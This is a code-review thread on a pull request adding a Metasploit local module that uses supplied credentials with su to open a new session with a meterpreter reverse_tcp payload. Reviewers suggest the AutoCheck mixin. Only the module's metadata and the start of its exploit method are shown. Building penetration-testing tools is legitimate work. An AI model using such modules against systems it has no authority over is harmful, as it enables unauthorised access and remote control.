modules/exploits/linux/local/su_login.rb

```diff
@@ -0,0 +1,179 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  include Msf::Post::Linux
+  include Msf::Post::Linux::System
+  include Msf::Post::Unix
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+
+  Rank = NormalRanking
+
+  def initialize(info = {})
+    super(
+        update_info(
+          info,
+          'Name' => 'Login to Another User with Su on Linux / Unix Systems',
+          'Description' => %q{
+            This module attempts to create a new login session by
+            invoking the su command of a valid username and password.
+
+            If the login is successful, a new session is created via
+            the specified payload.
+
+            Because su forces passwords to be passed over stdin, this
+            module attempts to invoke a psuedo-terminal with python,
+            python3, or script.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => 'Gavin Youker <youkergav@gmail.com>',
+          'DisclosureDate' => '1971-11-03',
+          'Platform' => ['linux', 'unix'],
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Targets' => [
+            [
+              'Linux x86', {
+                'Arch' => ARCH_X86,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'Linux x86_64', {
+                'Arch' => ARCH_X64,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+              }
+            ],
+          ],
+          'DefaultTarget' => 0,
+          'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
+          'SessionTypes' => ['shell', 'meterpreter']
+        )
+    )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'Username to authenticate with.']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with.'])
+    ])
+
+    register_advanced_options([
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ])
+  end
+
+  # Main function to run the exploit.
+  def exploit
+    # Check for vulnerable system.
+    if check == CheckCode::Safe
+      fail_with(Failure::NotVulnerable, 'target is not vulnerable')
+    end
```

Comment:
You could use the `AutoCheck` mixin here instead.

Reply:
Might you be able to provide an example of how to use this mixin? I was a hard time understanding documentation and could not find any implementations of this.

Reply:
It is relatively new, so most modules do not use it, but it is handy.  After the include statements, prepend `Msf::Exploit::Remote::AutoCheck`.  Then the `check` method of the module will be called automatically.
You can see this in https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/cve_2020_0796_smbghost.rb

Reply:
Once the prepend statement has been added you can remove these three lines to call `check`. The `check` method is called automatically.

Reply:
Thanks for the help. This has been applied in the most recent commit. See d623d850409968192615b4bc062009a9824a758f